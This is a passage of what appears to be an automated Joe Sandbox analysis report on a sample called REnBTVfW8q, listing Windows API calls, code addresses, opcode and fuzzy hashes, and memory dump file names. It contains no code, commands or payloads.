                                                                                              • Opcode ID: 0d9b5a9160a84728accbd0ba24abc03ccaba2c832cc1b566ade503702ea0418f
                                                                                              • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                              • Opcode Fuzzy Hash: 0d9b5a9160a84728accbd0ba24abc03ccaba2c832cc1b566ade503702ea0418f
                                                                                              • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                              • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                              • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                              • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                              • Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                              • Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                              • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                              • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 004039DE
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 004039F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: b55cff4552d52d76d05c17db1d45919cd3b2f7dc16ec8014ab047bfb7f0b1341
                                                                                              • Instruction ID: fc38efd84d8d016dcd3317839c289eb32d5c21f0986e32e85f71fbf804eaa656
                                                                                              • Opcode Fuzzy Hash: b55cff4552d52d76d05c17db1d45919cd3b2f7dc16ec8014ab047bfb7f0b1341
                                                                                              • Instruction Fuzzy Hash: 32E0867150071496C524AF7CAE4A5863A185B45335B204726F0B8F21F0C77899675ED9
                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 390214022-0
                                                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004112E5,0040CED0,004033C2,0040CED0,004112E5,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                              • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                              • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                              • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                              • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000039,004281E0,?,00000039,?,004062AB,?,00000000,00000039,00000039,004281E0,?), ref: 00406241
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                              • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                              • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 2649f5da5d887e61587a2cb4427c422aea5fe64ba67ab3b65f439a0ed3d10397
                                                                                              • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                                                              • Opcode Fuzzy Hash: 2649f5da5d887e61587a2cb4427c422aea5fe64ba67ab3b65f439a0ed3d10397
                                                                                              • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                                              • Instruction ID: cd8ab83c4a05c7db73f02061534639f879ad9b89da22042d3f94ff2104185c27
                                                                                              • Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                                              • Instruction Fuzzy Hash: 83C04CB5780200BAEA208BA49D85F0677545B90700F1449797640F50E0C674D460D66C
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
